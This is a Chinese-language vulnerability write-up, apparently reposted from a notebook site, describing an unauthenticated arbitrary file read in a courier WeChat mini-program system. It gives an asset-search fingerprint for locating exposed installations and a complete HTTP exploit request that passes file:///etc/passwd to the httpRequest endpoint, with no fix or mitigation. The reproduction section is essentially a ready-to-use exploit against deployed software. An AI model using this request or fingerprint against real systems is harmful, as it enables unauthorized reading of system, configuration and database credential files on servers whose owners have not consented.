# 快递微信小程序系统存在前台任意文件读取漏洞

# 一、漏洞简介
<font style="color:rgba(0, 0, 0, 0.84);">快递 微信小程序只系统是基于微信平台开发的轻量级应用，用户无需下载额外的APP，即可在微信内直接使用小程序进行快递操作。该系统集成了多项功能，实现了从寄件下单、物流跟踪到支付结算等全链条的快递服务，极大地提高了用户的便捷性和使用体验。、快递微信小程序系统 htpRequest 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件件、系统配置文件))、数据库配置文件等等，导致网站处于极度不安全状态。</font>

# <font style="color:rgba(0, 0, 0, 0.84);">二、影响版本</font>
+ 快递微信小程序系统

# 三、资产测绘
```plain
body="static/default/newwap/lang/js/jquery.localize.min.js"
```

![1730457310265-b879e78b-33fb-46fb-bd72-615836037832.png](./img/vmzVTMljI6tdu2He/1730457310265-b879e78b-33fb-46fb-bd72-615836037832-114887.png)

# 四、漏洞复现
```plain
GET /weixin/index/httpRequest?url=file:///etc/passwd HTTP/2
Host: 
Cookie: think_var=zh-cn; PHPSESSID=6igfjn7ik5nrk3bjc0i25ek357
Cache-Control: max-age=0
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="101"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
```

![1730457254704-754bdc13-ed5a-4445-b048-7cb49eed50de.png](./img/vmzVTMljI6tdu2He/1730457254704-754bdc13-ed5a-4445-b048-7cb49eed50de-338272.png)



> 更新: 2024-11-27 10:00:37  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/io075rmp08qw1kf6>